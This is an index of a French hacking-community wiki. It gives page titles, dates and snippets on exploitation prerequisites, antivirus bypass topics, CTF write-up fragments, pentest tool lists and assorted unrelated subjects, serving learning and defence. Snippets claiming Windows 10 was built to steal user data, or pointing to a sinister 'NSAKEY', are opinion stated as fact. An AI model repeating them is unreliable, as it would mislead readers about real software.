Le PAD pour améliorer cette page : TODO * Détailler plus le format ELF * Expliquer différentes injections Cet article va vous présenter les différentes techniques qui existent afin d'injecter du code de manière statique dans un fichier ELF, que ce soit sur architecture 32 bits ou 64 bits, sous une distribution GNU/Linux.

installation_de_shadow_defender

2013-06-14T11:18:35+02:00

Shadow Defender permet de fournir une protection un peu particulière, toutes les modifications du systéme sont annulés (copie de fichiers, installation de programmes ... )une fois le système redémarré ce dernier reprend son état initial lors de l'activation de la protection . bien entendu il faut faire attention puisque cette protection pourrai se retourner contre vous en supprimant des fichiers que vous aurez voulu garder !

installation_de_windows_xp_et_des_additions_invites_sous_virtualbox

2013-06-14T10:17:58+02:00

Installation de Windows Xp Une fois VirtualBox lancé : Cliquez sur New Cliquez sur Next Choisissez un nom pour votre machine ainsi que le système d'exploitation et cliquez sur Next Choisissez le montant de mémoire vive que vous désirez donner au Os, notez que si vous n'avez que peu de mémoire vive, 256 MB feront largement l'affaire .

ios

2019-10-27T11:36:31+02:00

FIXME Le PAD pour proposer une amélioration à cette page : Open-source jailbreaking tool for many iOS devices A completely free, open source and online course about Reverse Engineering iOS Applications.

ipfs

2018-01-27T22:54:30+02:00

InterPlanetary File System (ou IPFS, système de fichier inter-planétaire), est un protocole pair à pair de distribution de contenu adressable par hypermédia, conçu à l'origine par Juan Benet. L'implémentation principale d'IPFS est un logiciel libre dirigée par l'Interplanetary Networks.

irc

2019-02-28T17:04:58+02:00

Internet Relay Chat (IRC) est un système qui facilite le transfert de messages sous forme de texte. Le processus de discussion fonctionne sur un modèle de réseau client/serveur. Les clients IRC sont des programmes informatiques qu'un utilisateur peut installer sur son système. Ces clients peuvent communiquer avec des serveurs de discussion pour transférer des messages à d'autres clients.

java

2019-10-25T12:56:31+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 [Checker Framework]() - Pluggable type-checking for Java 🛠 [checkstyle]() - checking Java source code for adherence to a Code Standard or set of validation rules (best practices)

java_web

2019-10-25T12:56:51+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 We help your business to secure PHP and Java web applications with language specific code analysis. 🛠 xanitizer

jeux_video

2020-03-06T16:16:38+02:00

Jeux vidéo liés au hacking * Syndicate (1993) - RTS avec un thème cyberpunk. * Syndicate Wars (1996) - RTS avec un thème cyberpunk. * Uplink (2001) - Terminal hacking simulator. * Enter the Matrix (2003) - Écrit par les créateurs de Matrix et contenant une heure de cinématiques filmées pendant Matrix 2, le jeu était énormément buggé a sont lancement et a déçu des millions de fans. même avec les patch officiels et patchs de fans c'est toujours pas terrible. * The Matrix: Path o…

js_scripts

2019-10-25T12:57:21+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 NodeJsScan is a static security code scanner for Node.js applications. 🛠 NodeSS: Node.js Security Scanner

kernel_land

2017-04-09T15:33:57+02:00

Cette page a pour but de réunir différents articles sur la programmation système et noyau * Programmation de Modules Kernels sous Linux : Un document pour apprendre à manipuler et programmer les Modules Kernels de Linux

kit_pentest_android

2022-07-06T15:44:26+02:00

🛠 AAPG [A]ndroid [A]pplication [P]entest [G]uide 🛠 WifiKill : Sert à Voir qui est connecté sur votre réseau local puis le deconnecter de votre réseau à la façon de Netcut sur PC 🛠 zAnti : Cette App est un Backtrack-like qui contrôle vos appareils a distance en reseau local, malheuresement elle est payante

les_achats_en_chine

2017-11-04T11:56:49+02:00

Liste de fournisseurs chinois * aliexpress.com (marketplace) - Grand classique. Très grande collection d'objets, service client assez bon, ils seront de votre côté si vous avez un litige avec un vendeur et que celui-ci est dans l'erreur, tout comme Ebay. Possibilité d'utiliser leur service Alipay pour le payement qui permet de cacher les détails de votre carte bancaire au vendeur, tout comme Paypal. * banggood.com - Accepte Paypal et vous pouvez commander sans faire un compte. Ils possède…

les_pre-requis

2017-04-09T15:33:57+02:00

les_pre-requis_cryptographie

2017-04-09T15:33:57+02:00

* Comprendre comment fonctionne la substitution monoalphabetique (cesar et dérivé) Lien1 Lien2 Lien3 Lien4 * Comprendre Vigenere et les moyens de le compromettre Lien1 Lien2 Lien3 * Comprendre RSA Lien1 Lien2 * Comprendre AES Lien1 Lien2 Lien3 * Comprendre DES Lien1 Lien2 * Comprendre 3DES Lien1 * Se familiariser avec les concepts de la cryptanalyse Lien1 Lien2

les_pre-requis_failles_applicatives

2017-12-11T11:13:26+02:00

* Réaliser les prérequis "Rétro-ingénierie" 1 à 4 * Exploiter une faille system() Lien1 * Exploiter une Race Condition Lien1 Lien2 Lien3 * Exploiter un Buffer Overflow et en profiter pour Apprendre un langage de Script pour automatiser l'éxploitation Lien1 Lien2 * Exploiter un Format String Lien1 Lien2 Lien3 * Exploiter un Heap Overflow via malloc() et un off-by-one Lien1 Lien2 Lien3 Lien4 Lien5 Lien6 Lien7 Lien8 * Apprendre à exploiter un use-after-free Lien1 Lien…

les_pre-requis_forensic

2017-04-13T15:30:40+02:00

* Procédure forensique lien1 lien2 * Architecture disques durs lien1 * Processus de boot lien1 * MBR lien1 lien2 * Live memory lien1 lien2 * Analyse de logs lien1 * Windows file systems (FAT, NTFS) lien1 lien2 * Registres lien1 * Linux file systems (ext2/3) lien1 lien2 lien3

les_pre-requis_pentesting

2017-04-09T15:33:57+02:00

* Avoir au moins déjà réalisé les prérequis des listes Failles Applicatives de 1 à 5 et Réseau de 1 à 11, des connaissances en Web sont un plus * Assimiler les notions d'exploits et de payloads * Comprendre comment marche un anti-virus (analyse heuristique et recherche de signatures) * Comprendre comment bypasser les protections antivirus (modification de signature, packer, binder, race condition...) * Comprendre les avantages et les inconvénients d'un payload de type reverse_tcp contre…

les_pre-requis_reseau

2015-06-07T13:29:33+02:00

FIXME Cette page est en court de rédaction, n'hésitez pas à y apporter votre contribution. Pour bien aborder le réseau il faut en comprendre la logique et donc remonter aux sources des réseaux. La raison qui a nécessité de connecter entre eux des ordinateurs est cruciale et explique les efforts fournit à l'époque de la création des réseaux. Pour autant ces réseaux n'étaient que les embryons de ce que nous connaissons aujourd'hui sous cette appellation et le réseaux des réseaux, l'Internet, n'ét…

les_pre-requis_retro-ingenierie

2017-04-09T15:33:57+02:00

* Apprendre le C Lien Lien2 Lien3 * Maitriser des différentes bases de numération (binaire, hexa, octal, base64) Lien1 * Apprendre l'ASM et reverser ses programmes en C avec un désassembleur Lien1 Lien2 Lien3 Lien4 * Bosser sur des crack-me pour se faire la main (Prenez l'habitude de bosser dans une machine virtuelle, c'est plus safe) Lien1 Lien2 * Unpack de programme packé avec UPX Lien1 Lien2 * Unpack de programme packé avec Yoda's Protector Lien1 * Connaitre le fonctionnement du …

les_pre-requis_steganographie

2016-09-19T13:47:09+02:00

* Comprendre le format BMP Lien1 - Lien2 * Maîtriser les différents principes de stéganographie sur le BMP Lien1 - Lien2 - Lien3 * Voir quels formats de fichier sont les plus exploités et par quels techniques Lien1 * Exiv2 * TweakPNG * Stegsolve * pngcheck * Steghide

les_pre-requis_web

2020-02-08T22:29:36+02:00

FIXME Le PAD pour proposer une amélioration à cette page : * Introduction Lien * Apprendre l'HTML et le CSS -> Lien * Apprendre le Javascript -> Lien * Apprendre le PHP -> Lien - Lien - Lien * Savoir à quoi sert le fichier robots.txt et en quoi celui-ci peut être utile dans la collecte d'information -> Lien - Lien * Comprendre comment fonctionne le vol de sessions -> Lien * Apprendre à exploiter les XSS, persistantes et non persistantes…

les_pre_requis_systeme

2015-06-07T14:32:25+02:00

* Les commandes Linux Lien * Comprendre le fonctionnement des processus linux Lien * Windows Internals * Windows Sysinternals Administrator's Reference * Advanced linux programming [Ebook] VF

liberte

2020-08-12T15:20:24+02:00

[Never forget.] C'est ce que nous recherchons tous. Atteindre la liberté totale dans l'utilisation de la technologie est la plus grande réalisation qu'un homme puisse atteindre. Il y a des rumeurs que lorsque cela se produit, de la lumière dorée commence à émaner de l'écran de votre ordinateur et Richard Stallman se matérialise dans votre chambre. Il a écrit la GPL pour vous aider à atteindre cet état de nirvana. Afin d'avoir une vraie liberté, selon la GPL, vous devez …

licences

2017-11-05T15:43:52+02:00

Il existe de nombreuses licences de droits d'auteur publiques disponibles pour utilisation avec des logiciels, des œuvres d'art et d'autres œuvres créatives. Ils permettent aux auteurs d'accorder à d'autres des autorisations de redistribution et de modification qui, autrement, violeraient les droits d'auteur normaux. Veuillez noter que le droit d'auteur est distinct du droit des brevets et des marques. Ceux-ci peuvent imposer des restrictions supplémentaires à l'utilisation d'une œuvre.

linus_torvalds

2018-01-27T18:55:43+02:00

Linus Torvalds est le créateur du noyau Linux et du système de contrôle de version Git. Il est ingénieur logiciel finno-américain et est employé par la Linux Foundation en tant que coordinateur du projet Linux. Linux Unix était un système d'exploitation vraiment bien fait, mais beaucoup de gens n'aimaient pas le fait qu'il s'agissait d'un logiciel propriétaire. GNU visait à remplacer Unix par son propre système d'exploitation gratuit. Ils ont commencé cet effort en construisant les composant…

linux

2019-10-25T13:02:24+02:00

FIXME Le PAD pour proposer une amélioration à cette page : Guide complet :

liste_d_extension_burp

2020-01-03T23:01:46+02:00

FIXME Le PAD pour proposer une amélioration à cette page : * Burp Suite extension to discover assets from HTTP response using passive #scanning. * [summitt/Burp-Non-HTTP-Extension: Non-HTTP Protocol Extension (NoPE) Proxy and DNS for Burp Suite.]() * [SpiderLabs/Airachnid-Burp-Extension: A Burp Extension to test applications for vulnerabilit…

liste_d_outil_en_ligne

2020-01-02T11:19:02+02:00

🛠 Online Curl - curl test, analyze HTTP Response Headers. 🛠 Online Tools for Developers - HTTP API tools, testers, encoders, converters, formatters, and other tools. 🛠 Ping.eu - online Ping, Traceroute, DNS lookup, WHOIS and others.

liste_de_logiciels_recommandes_pour_android

2017-11-04T17:46:26+02:00

"App Stores" * F-Droid (FOSS Repo) * Aptoide * ApkTrack Navigateur webs * Firefox for Android * Google Chrome for Android * Chromium * Lightning * Naked Browser Communications * Signal * Silence * Xabber — supporte OTR * Conversations — Client XMPP god tier qui supporte OMEMO, GPG, et OTR. * DEPRECATED * K-9 Mail (Email) * Telegram (IM) * Antox * QKSMS

liste_de_logiciels_recommandes_pour_gnu_linux

2018-04-12T21:51:52+02:00

Communications Navigateurs Chromium Chromium Un navigateur libre et gratuit basé sur le code sous-jacent de Chrome. Bien que presque identique au navigateur de Google, Chromium ne possède pas de composant propriétaires comme la mise à jour automatique, le lecteur flash, etc... et n’inclus pas les fonctionnalités de pistages de Chrome.

liste_de_logiciels_recommandes_pour_os_x

2017-11-04T14:14:45+02:00

Gestionnaire de paquets * Homebrew — Gratuit * MacPorts — Gratuit * Portage — Gratuit Émulateurs de terminal * iTerm 2 — Gratuit * TotalTerminal — Gratuit Communication Navigateurs web Clients Email * Thunderbird * Airmail — $2 * Opera Mail

liste_de_logiciels_recommandes_pour_windows

2021-12-23T18:46:53+02:00

Windows 10 est déconseillé en raison du fait qu'il ait été conçu pour faire de la fouille de données et du vol de données utilisateur. Windows 7 est considéré comme sûr si vous supprimez les mises à jour de télémétrie fournies par Microsoft. Non seulement ça, mais il existe un élément suspect dans la base de registre connu sous le nom "NSAKEY" qui existe depuis Windows NT 4. En raison de ces problèmes, utilisez tous les systèmes windows avec une extrême prudence.

liste_des_entreprises_en_securite_informatique

2012-07-30T19:48:18+02:00

Dans le cadre d'une recherche de stage, de cdi ou de changement de postes, une liste des entreprises qui travaillent dans le domaine de la sécurité informatique. Pour chaque boîte est indiqué, le type d'entreprise, ses activités, sa ou ses localisations (concernant les groupes, je vous invite à consulter le site officiel afin d'avoir plus d'infos). Bonne recherche !

liste_des_evenements_cybersecurite_2018_en_france

2019-05-21T13:50:30+02:00

Bonjour, On aime tous se rassembler sur la thématique de la cyber sécurité. On a tous raté des événements en se disant ”Mince si j'avais su avant que cet événement était dans ma ville cette soirée, j'y serai allé” Je propose que nous maintenons à jour se topic qui ?contiendra la liste des évènements de 2018 publique et non commerciaux en France à propos de la cyber sécurité. Svp faites aussi un peu de communication sur l'IRC dès qu'un nouvel événement est rajouté.

liste_des_evenements_cybersecurite_2019_en_france

2019-12-11T10:40:47+02:00

Bonjour, On aime tous se rassembler sur la thématique de la cyber sécurité. On a tous raté des événements en se disant ”Mince si j'avais su avant que cet événement était dans ma ville cette soirée, j'y serai allé” Je propose que nous maintenons à jour se topic qui ?contiendra la liste des évènements de 2019 publique et non commerciaux en France à propos de la cyber sécurité. Svp faites aussi un peu de communication sur l'IRC dès qu'un nouvel événement est rajouté.

liste_des_evenements_cybersecurite_2020_en_france

2020-04-28T15:25:52+02:00

Si vous voulez rajouter un événement , rajoutez le au PAD collaboratif : Janvier Meet hackerzvoice, majinboo nous fera un talk “write-up” sur le chall , Paris, 11 janvier,

liste_des_gros_evenements_cybersecurite_2018_en_europe

2019-02-11T09:17:19+02:00

Si vous aussi vous avez envie de voyager et ne pas rater un des plus gros événements en sécurité informatique en Europe. Voici la liste des 5 plus gros événements sécu par pays en Europe à ne pas manquer. Allemagne Troopers @WEareTROOPERS Heidelberg, March 12-16 2018

listes_des_choses_utiles_indispensables

2017-04-09T15:33:57+02:00

* Savoir utiliser les Regexp Lien1 Lien2 Lien3 Lien4 * Connaitre un langage de script afin d'automatiser certaines taches (Ruby, Python, Perl...) Lien1 Lien2 Lien3 * Se familiariser avec les système d'exploitation linux/unix, la majorité des tools s'y trouvant (c'est presque indispensable en fait...) Lien1 Lien2 * Savoir créer une machine virtuelle (pas indispensable mais ubber pratique) Lien1 Lien2 * Savoir lire l'anglais, sans vouloir décourager les anglophobes, la majorité de la docu…

livres

2018-01-27T22:06:56+02:00

Livres Distribués dans une variété de formats tels que .pdf et .mobi, les livres sont des liasses de textes destinés à des fins éducatives ou de divertissement. Les livres audio (parfois appelés livres parlants) sont des fichiers audio dans lesquels une personne qui parle bien vous lit le livre, semblable à un podcast.

mark_shuttleworth

2018-01-27T18:18:46+02:00

[Mark Shuttleworth utilisant un PC dans l'ISS.] Mark Shuttleworth (né le 18 septembre 1973 à Welkom, État libre d'Orange) est un entrepreneur anglo-sud-africain principalement connu pour avoir créé Canonical Ltd. qui développe le système d'exploitation Ubuntu. Il fut également l'un des premiers touristes de l'espace et le premier citoyen africain à voyager dans l'espace.

materiel_libre

2017-11-08T03:10:02+02:00

[routage de la carte Arduino Mega 2560] Matériel libre, (alternativement, matériel Open-source, matériel ouvert) est un périphérique ou un composant avec lequel des schémas détaillés et/ou d'autres informations sont disponibles pour quiconque souhaitant l'améliorer ou le modifier. Le terme signifie le plus souvent que certaines des informations sur le matériel est facilement discernable pour que d'autres puissent le faire - en le couplant étroitement au mouvement du DIY. La conception maté…

mbr

2017-11-12T20:12:58+02:00

Définition Le MBR ou Master Boot Record et le premier secteur d'un disque ou d'un clé USB. Il contient différentes informations qui permettent l'identification du disque, l'identification des partitions et le démarrage du système d'exploitation.

memoire_vive

2017-11-12T20:36:21+02:00

Outils d'extraction * LiME : * pmem : * Linux : * Mac : * Windows :

methodologie_et_outils_libres

2017-04-09T15:33:57+02:00

mots_de_passe

2025-11-05T10:44:56+02:00

Les mots de passe sont souvent compromis hors ligne en cassant leur hachage. Pratiquement tous les mois, un énorme site Web avec des millions d'utilisateurs se fait piraté et ça base de données rendue publique ou vendue au plus offrant. La plus grande base de données à ce jour de mot de passe est RockYou.

musique

2021-05-29T19:50:48+02:00

Ambiant Quand fait correctement, la musique ambiante 'doit être aussi ignorable qu'intéressante'. Cela en fait l'un des meilleurs genres de musique à écouter tout en programmant ou en faisant une autre activité qui exige un plus haut niveau de concentration et d'attention. Ci-dessous vous trouverez quelques exemples, bien que vous êtes encouragé a chercher par vous même sur le Web ce qui vous correspond le mieux.

natas_wargame

2012-11-09T15:44:55+02:00

"Natas teaches the basics of serverside web-security. Each level of natas consists of its own website located at , where X is the level number. There is no SSH login. To access a level, enter the username for that level (e.g. natas0 for level 0) and its password. Each level has access to the password of the next level. Your job is to somehow obtain that next password and >level up. All passwords are also stored in /etc/natas_webpass/. E.g. the password…

ndh2k12_public

2013-02-08T17:45:19+02:00

Link : Web Workerz 1500 pts InjectMe 1000 pts Zombie Online Massive Game 1000 pts Personal Blog 500 pts Pastag Auth 500 pts Crackme Lost USB key 1000 pts Stay Alive 500 pts Crackme Bukkake 500 pts Engage le jeu que je le gagne 500 pts

ndh2k14_wargame_public

2014-06-30T21:29:06+02:00

Crypto * Aussie Hackerz * NDH2K14_Wargame_Public_crypto2 * NDH2K14_Wargame_Public_crypto3 * NDH2K14_Wargame_Public_crypto4 Stegano * HZCoin * NDH2K14_Wargame_Public_stegano2 * NDH2K14_Wargame_Public_stegano3 * NDH2K14_Wargame_Public_stegano4

ndh2k14_wargame_public_crypto1

2017-04-09T15:33:57+02:00

Le chalenge consistais à télécharger sur un lien un fichier contenant ce texte. 3035C994C99FC9943831327170373337C79DC99FC994C990703238C990343771313137C994323338C990383735C99FC79DC79D3833E280BE3431CA9E32C9A57075

ndh2k14_wargame_public_crypto2

2014-07-10T12:50:19+02:00

Challenge avec beaucoup de fichiers, mais le chiffré est l'image suivante : J'ai pas la table de déchiffrement ... Mais en gros l'idée c'est qu'on a un manuel de couture qui reprend chaque image (plus 3 ou 4 mais on peut simplement les ignorer puisqu'elles ne sont pas dans le chiffré). On remarque qu'il y a 16 icones de coutures utilisées dans le chiffré.

ndh2k14_wargame_public_forensic1

2017-04-09T15:33:57+02:00

Ici, le but est de trouvé combien de bitcoin nous nous sommes fait voler. On nous fournit un fichier, HoldUp.img, de 16Mo. La commande file nous apprend qu'il s'agit d'une image de type ext3 : Il ne nous reste plus qu'à monter cette image avec la commande mount : mount -t ext3 Holdup.img ./MountFile

ndh2k14_wargame_public_stegano1_hzcoin

2017-04-09T15:33:57+02:00

Dans cette épreuve une image au format .png nous est fournie. La voici : Avec hachoir-subfile.py nous nous rendons vite compte que cette image en contient deux : Intéressant. On va donc, toujours avec hachoir-subfile, récupérer ces deux images en rajoutant un chemin d'extraction en deuxième paramètre de cette commande : hachoir-subfile HZCoin.png ./

ndh2k14_wargame_public_web1

2017-04-09T15:33:57+02:00

Je n'ai eut l'intelligence de prendre des screenshot donc, si quelqu'un en a pris... Dans cette épreuve, nous avions un bête formulaire de login. Après quelques tentatives, nous pouvions tomber sur un message en anglais du type ”... utilisez votre tête”, head en anglais.

ndh_2015_quals

2017-04-09T15:33:57+02:00

NDH 2015 Quals # Title Category Points 1 faceBox Web 100 2 faceSec Web 100 3 Mickey Web 1 4 SecureAuth Exploit 350 5 Updator Exploit 200 6 Cooper Stegano 300 7 Superman Crackme/Reverse 500 8 Mass Surveillance Software Crackme/Reverse 300 9 Clark Kent Crackme/Reverse 150 10 Crackme Prime Crackme/Reverse 150 11 PDFCeption Forensic 500 12 Bpythonastic Forensic 300 13 Private Forensic 100 14 WeshGrow Crypto 300 15 Game Of Life Crypto 150 1…

ndh_2016_quals

2016-04-03T13:49:10+02:00

NDH 2016 Quals matriochka-step-1 Crackme Catch me if you can Stega stegano-sound Stega

ndh_2018_quals

2018-04-01T15:35:18+02:00

NDH 2018 Quals where-is-my-purse Forensic

nethunter_nexus_5

2020-04-23T15:43:46+02:00

Installer Nethunter et Android 6 Marshmallow sur un Nexus 5. But : Sortir de la poussière ce vieux téléphone et auditer des applications android Prérequis La version de base est android 4.4.2, numéro de build KOT49H (Mais cela n’empêchè pas d'avoir une autre version d'Android)

newbie_contest

2017-04-09T15:33:57+02:00

Cette page a pour but de rassembler un maximum de challenges au sein de ce même site. Il vous est demandé de respecter celle-ci, en effet chacun est apte à apporter une quelconque modification aux posts. (uniquement les membres) Le principe de ce wiki est simple : Vous êtes libres si l'envie vous prend de réaliser un write up sur un challenge de Newbie Contest (quel qu'il soit). La communauté de Zenk-Security étant en partie basée sur le partage d'informations, ce wiki est là pour ça.…

nsa

2017-11-05T02:31:20+02:00

La National Security Agency, ou plus exactement, la National Spying Agency est une agence du gouvernement américain qui collecte des données pour garder une trace de, eh bien, tout ce qu'il peut. Si la NSA veut vous espionner et recueillir des renseignements sur vous, ils le feront.

nullcon_battleunderground_2013

2013-03-02T17:19:55+02:00

Nullcon BattleUnderground est un CTF de type Jeopardy individuel. Programming * Question 1 * Question 2 * Question 3 * Question 4 * Question 5 Crypto * Question 1 * Question 2 * Question 3 * Question 4 * Question 5 RE * Question 1 * Question 2 * Question 3 * Question 4 * Question 5

nullcon_battleunderground_2013_exploitation_3

2017-04-09T15:33:57+02:00

Lets do some PHP À la fin de la page de présentation, un commentaire c'est glissé avec un lien vers la source de cette page.

nullcon_battleunderground_2013_misc_1

2013-03-02T17:26:39+02:00

Who wrote the private key on whiteboard just by looking at the public certificate? During his own Google interview, Jeff Dean was asked the implications if P=NP were true. He said, "P = 0 or N = 1." Then, before the interviewer had even finished laughing, Jeff examined Google’s public certificate and wrote the private key on the whiteboard.

nullcon_battleunderground_2013_misc_3

2013-03-03T13:16:05+02:00

Piece of cake.. really. Le fichier décompressé se nomme 1.bin. Il s'agit d'une capture Wireshark. On se retrouve avec des paquets RTP (G. 711). Le protocole de signalisation est SIP, on peut penser à de la VoIP. Wireshark nous permet de sauvegarder les streams directement. Pour cela, sélectionné le premier paquet RTP (N°10):

nullcon_battleunderground_2013_re_2

2013-03-02T17:25:13+02:00

Look deep. Sample Nous nous trouvons face à un exécutable Windows x86. PROTECTiON iD nous donne la détection suivante: Scanning -> D:\nullcon\re\2\2.exe File Type : 32-Bit Exe (Subsystem : Win GUI / 2), Size : 276897 (0439A1h) Byte(s) [x] Warning - FileAlignment seems wrong.. is 0x00000200, calculated 0x00000400 -> File has 417 (01A1h) bytes of appended data starting at offset 043800h [File Heuristics] -> Flag : 00000000000000001100001000100111 (0x0000C227) [!] UPX 3.08 compressed !

olia_lialina

2020-12-08T11:10:43+02:00

Olia Lialina, née à Moscou le 4 mai 1971, est une artiste qui travaille avec le medium Internet. [Olia Lialina avec un ami et partenaire, Dragan Espenschied] Biographie Olia Lialina est une pionnière du Net art. Elle a fait partie du groupe net.art aux côtés des artistes Heath Bunting, Vuk Cosic, Jodi et Alexei Shulgin jusqu'à la proclamation de la mort du groupe en 1998. Elle a étudié l'analyse cinématographique et le journalisme à l'université d'État de Moscou. Elle a fondé le site Art Tele…

osce_ctp

2019-10-28T09:02:12+02:00

OSCE reviews OSCE Study Plan OSCE study guide

oscp_pwk

2023-03-29T16:22:36+02:00

OSCP tools SPARTA is a python GUI application which simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by having point-and-click access to his toolkit and by displaying all tool output in a convenient way. If little time is spent setting up commands and tools, more time can be spent focusing on analysing results.

oscp_survival_guide

2025-01-28T19:42:26+02:00

---------- Note : Cette page est un copié/collé de cette ressource : L'auteur original semble être Austin Scott et l'objectif de cette page est de sauvegarder ce document. ---------- Added on pastebin NOV 20TH, 2018 # OSCP-Survival-Guide

   _____ _____ _____ ______   _____                  _            _   _____       _     _
  |  _  /  ___/  __ \| ___ \ /  ___|                (_)          | | |  __ \     (_)   | |
  | | | \ `--.| /  \/| |_/ / \ `--. _ …

oswe_awae

2020-02-01T10:53:49+02:00

Le PAD pour améliorer cette page : OSWE Certification Exam Guide Tips from offsec about OSWE :

oswp_wifu

2019-09-01T16:09:38+02:00

OSWP Reviews OSWP Reviews OSWP Reviews

outils_binaire

2019-05-12T19:25:30+02:00

La plupart des outils listé sur cette page ont été conçu pour Windows. Analyse / édition de fichiers statiques ou d'exécutables. Interface graphique HxD HxD peut ouvrir n'importe quel type de fichiers et éditer son contenu en base 16. HxD Hex Editor affiche trois colonnes : les offsets, le code hexadécimal et le code ASCII correspondant.

outils_d_analyses

2019-03-11T10:13:56+02:00

Image Copie du support Analyse * Framework * The sleuthkit : Carving * * * * *

outils_forensic

2019-10-14T19:17:07+02:00

Systemes d'exploitation * bitscout - LiveCD/LiveUSB Analyse et acquisition distante * Tsurugi - Distrib linux pour analyse forensique * SANS Investigative Forensics Toolkit (sift) - La distrib SANS pour L'analyse forensique Frameworks * dff - Forensic framework * dexter - Framework d'acquisition, extensible et sécurisé * IntelMQ - IntelMQ Framwork de collecte et d'agrégation de flux TI/IOC pour la réponse a incident. * Laika BOSS - IDS avec fonctionnalité de scan et analyse d'ob…

outils_malware

2019-10-22T12:16:52+02:00

Par soucis de redondance au niveau des outils pouvant être utile ici, nous vous conseillons de jeter un œil également aux outils recommandés pour l'analyse de binaire. Permet de surveiller et de monitorer l'environnement durant l'exécution d'un programme. Très utile dans le cas d'analyse de code malveillants.

outils_necessaires_a_l_analyse_des_malwares

2013-06-14T12:07:43+02:00

Cette page contiendra les outils qui seront nécessaires à l'analyse des Malwares : Process Explorer Process Explorer donne une vue générale sur les processus, les dossiers, les fichiers et les clés de registres auquel accède une application donné .

outils_reseau

2019-06-14T09:07:54+02:00

FIXME Cette page est en court de rédaction, n'hésitez pas à y apporter votre contribution. Wireshark Wireshark Un analyseur de paquets libre utilisé dans le dépannage et l'analyse de réseaux informatiques, le développement de protocoles, l'éducation et la rétro-ingénierie.

outils_web

2019-10-22T12:18:33+02:00

Reconnaissance & Mapping webtech * Identify technologies used on websites. * Burp Suite * Ses différents outils (proxy, spider, scanner, intruder, repeater, sequencer, etc.) fonctionnent parfaitement ensemble pour proposer un cadre de pentesting complet, du mapping initial en passant par l'analyse de la surface d'attaque, jusqu'aux découvertes et exploitation des vulnérabilités.

overthewire_narnia

2013-03-01T19:09:55+02:00

We all have to start somewhere. Narnia is a wargame that has been rescued from the demise of intruded.net, previously hosted on narnia.intruded.net. Big thanks to adc, morla and reth for their help in resurrecting this game! What follows below is the original description of narnia, copied from intruded.net: Summary: Difficulty: 2/10 Levels: 10 Platform: Linux/x86 Author: nite Special Thanks: lx_jakal for pointing out a bug that made a level easier =) Description: This wargame is…

perl

2019-10-25T12:57:47+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 [Perl::Critic]() - Critique Perl source code for best-practices. 🛠 [PerlTidy::snd] Program that acts as a [syntax checker] and tester/enforcer for coding practices in Perl.

php

2019-12-31T15:08:27+02:00

FIXME Le PAD pour proposer une amélioration à cette page : 🛠 PHPStan v0.11.19 releases: PHP Static Analysis Tool 🛠 Cheatsheet for finding vulnerable PHP code using grep

privilege_escalation

2024-06-04T12:02:15+02:00

https://www.ns-echo.com/posts/cve_2023_33298.html https://flast101.github.io/docker-privesc/ https://github.com/stealthcopter/deepce https://github.com/CravateRouge/bloodyAD https://github.com/antonioCoco/RemotePotato0 https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4 https://github.com/Dec0ne/KrbRelayUp https://github.com/GhostPack/Certify https://github.com/mandiant/ADFSDump Windows Privilege Escalation Guide

projets_de_la_communaute

2012-11-08T13:36:22+02:00

Sur cette page sont répertoriés tout les projets qui sont prévus pour la communauté. On retrouve des projets lancés par le staff, mais aussi des projets lancés par les utilisateurs. Projets du staff * Groupe de travail web-conférence - Un groupe de travail destiné à réfléchir sur la mise en place de web-conférence * Bot IRC - Création d'un bot IRC pour afficher les nouveaux posts et autres actualités sur le channel principal * Plateforme d'organisation collaborative des projets - Projet …

proposition_d_audit

2014-01-14T14:43:27+02:00

* Yunohost : soltuion d'autohébergement * Nagios : solution de monitoring * Zimbra : webmail * Seeks : moteur de recherche décentralisé * Plugins Wordpress * OpenERP : ERP en python * OfBiz : un ERP en Java * Redmine : un bug tracker en rails * Trac : un bug tracker en python * Radiant : CMS en rails * Owncloud : DropBox like “libre”

proprietaire

2017-11-05T15:45:38+02:00

Propriétaire (ou non-libre) est tout ce qui est sous une license restrictive. Ce terme est utilisé à la fois par ceux qui suivent l'EFF, et par les membres de la communauté Open Source, ce qui peut rendre le terme vague. Pour un terme plus précis, les deux champs de pensée utilisent leurs propres définitions concrètes. Les adeptes de la Free Software Foundation utilisent le terme Non-free, tandis que les membres de la communauté Open Source utilisent le terme Closed-Source. Non-free et …

proxmark3easy

2018-01-22T01:17:08+02:00

J'ai reçu comme cadeau de noël un proxmark 3 Easy de chez ELECHOUSE. la version 'Easy' de proxmark est la moins chère de la gamme, c'est une version destinée au marché domestique chinois et coute environ 100$ L'ensemble du paquet mesure 82mm x 52mm, l'intérieur de la boite comporte une antenne LF 125 kHz, une antenne HF 13,56 MHz, un câble d'alimentation 'plat' avec revêtement siliconé, un ensemble de tags, un tournevis et les vises qui vont avec. Le proxmark 3 Easy possède un bouton de fonctio…

proxmark3v2

2022-12-08T14:28:34+02:00

Tutoriel de l'utilisation du Proxmark avec des Cartes Mifare Mifare est une marque de carte NFC appartenant à NXP. Il existe différents modèles de carte Mifare, on peut notamment citer : – Mifare Classic (avec 1 ou 4K de mémoire) – Mifare Ultralight – Mifare DESFireChaque type de carte ayant ses spécificités et ses variantes. Pour ce document, je me suis concentré sur l’étude des Mifare Classic 1K qui est un des modèles les plus répandu.…

pulseaudio

2017-11-04T22:00:48+02:00

PulseAudio est un système audio pour les systèmes d'exploitation POSIX, ce qui signifie qu'il est un proxy pour vos applications sonores. Il vous permet de faire des opérations avancées sur vos données sonores au passage entre votre application et votre matériel. Des choses comme le transfert de l'audio sur une autre machine, le changement du format de l'échantillon ou du nombre de canaux et le mélange de plusieurs sons en un seul sont facilement réalisés en utilisant un serveur de son. Il est l…

pwnium2k14_crypto1

2017-04-09T15:33:57+02:00

la chaîne à déchiffré est : QlpoOTFBWSZTWTxSmOAAAAsJAF/gOwAgADEAAAiZMNT0JbKzhCQcyQtA2gNbvXgSvxdyRThQkDxSmOA= en décodant en base 64 on observe l'entete “BZh91AY” qui est du BZ2 # echo QlpoOTFBWSZTWTxSmOAAAAsJAF/gOwAgADEAAAiZMNT0JbKzhCQcyQtA2gNbvXgSvxdyRThQkDxSmOA= | base64 -d > file # bzip2 -d -9 file

pwnium2k14_forensics1

2017-04-09T15:33:57+02:00

